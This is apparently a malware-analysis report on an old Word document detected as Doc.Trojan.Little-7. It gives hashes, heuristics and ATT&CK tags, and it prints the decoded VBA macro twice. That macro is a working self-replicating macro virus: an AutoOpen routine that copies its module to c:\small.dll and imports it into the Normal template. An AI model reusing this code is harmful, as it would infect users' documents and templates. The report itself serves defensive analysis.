Office (OLE) malware analysis — malicious · 05abfb286cbe1c6d

MALICIOUS

Office (OLE)

32.5 KB Created: 1997-09-17 11:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 898d971f6af044defdc85f646da482aa SHA-1: d2d212cea97b88ee4d640b6126cf6f5d7793c0ad SHA-256: 05abfb286cbe1c6d280241c6f0eeaec0ef0fb10bc269526fd23906bf5faf7fa5

140 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro attempts to export itself to 'c:\small.dll' and then import it, likely to establish persistence or execute a second-stage payload. The heuristic firings and ClamAV detection strongly indicate malicious intent, specifically a trojan dropper.

Heuristics 4

ClamAV: Doc.Trojan.Little-7 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Little-7
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 745 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	745 bytes
SHA-256: `eea32e2c8b4615673a40a16decdd5c220604c14f56a945a6b49b586c8cebbb95`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "s" Sub AutoOpen() On Error Resume Next A$ = "HKEY_CURRENT_USER\small" If (System.PrivateProfileString("", A$, "small") = False) Then ActiveDocument.VBProject.VBComponents("s").Export "c:\small.dll" NormalTemplate.VBProject.VBComponents.Import ("c:\small.dll") System.PrivateProfileString("", A$, "small") = True ElseIf ActiveDocument.VBProject.VBComponents.Item("s").Name <> "s" Then ActiveDocument.VBProject.VBComponents.Import ("c:\small.dll") End If End Sub

SHA-256: eea32e2c8b4615673a40a16decdd5c220604c14f56a945a6b49b586c8cebbb95

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "s"
Sub AutoOpen()
On Error Resume Next
A$ = "HKEY_CURRENT_USER\small"
If (System.PrivateProfileString("", A$, "small") = False) Then
ActiveDocument.VBProject.VBComponents("s").Export "c:\small.dll"
NormalTemplate.VBProject.VBComponents.Import ("c:\small.dll")
System.PrivateProfileString("", A$, "small") = True
ElseIf ActiveDocument.VBProject.VBComponents.Item("s").Name <> "s" Then
ActiveDocument.VBProject.VBComponents.Import ("c:\small.dll")
End If
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.